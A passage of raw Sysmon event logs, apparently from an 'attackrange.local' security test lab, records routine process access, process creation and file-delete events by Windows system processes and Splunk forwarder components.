07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808685Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808684Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808683Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808682Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808681Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808680Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.275{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F622-60EB-A079-00000000D001}2164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808679Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.275{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F622-60EB-A079-00000000D001}2164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808678Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.275{0C1E0330-F622-60EB-A079-00000000D001}2164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808722Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.978{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A4FCA7801E592E70C23709F41C44928,SHA256=DBC33308BE87A9E441F4BDB4FA47CA155BD3DF059A7141E32D1125E795604715,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808721Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.821{0C1E0330-F623-60EB-A279-00000000D001}1960216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808720Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F623-60EB-A279-00000000D001}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808719Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F623-60EB-A279-00000000D001}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808718Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808717Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808716Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808715Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808714Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808713Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808712Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808711Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808710Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808709Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.665{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F623-60EB-A279-00000000D001}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808708Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.650{0C1E0330-F623-60EB-A279-00000000D001}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808707Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.603{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31A6A5F481122834A7689435CF510FAB,SHA256=EFAB0E9820F208718175DF27587B057EA6816EBF2E2037190D03284AE04B1ADC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:27.179{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D0E101FB8A97E5BC9DC3A03AD01D539,SHA256=B09F2AC5D933EE260E9BBB9031A843598F190C8C79845C002DBDF1719CAD1A8D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808706Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:27.150{0C1E0330-F622-60EB-A179-00000000D001}3952640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000808737Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.634{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FFB128CA9FAD56A8E0E0944B31C71E7,SHA256=36254037B8FCFFB5E72F1FC470C181ECCD2FE2EA2AA6A32E53F8266403C061FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:28.194{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF8D5B36E28FAED4CB1E622C5FE2DB45,SHA256=242D5932AE92CA3929B246C622E4942E77664E5C732FD3BEEAA045A2E0E10435,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808736Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.493{0C1E0330-F624-60EB-A379-00000000D001}1640712C:\Program 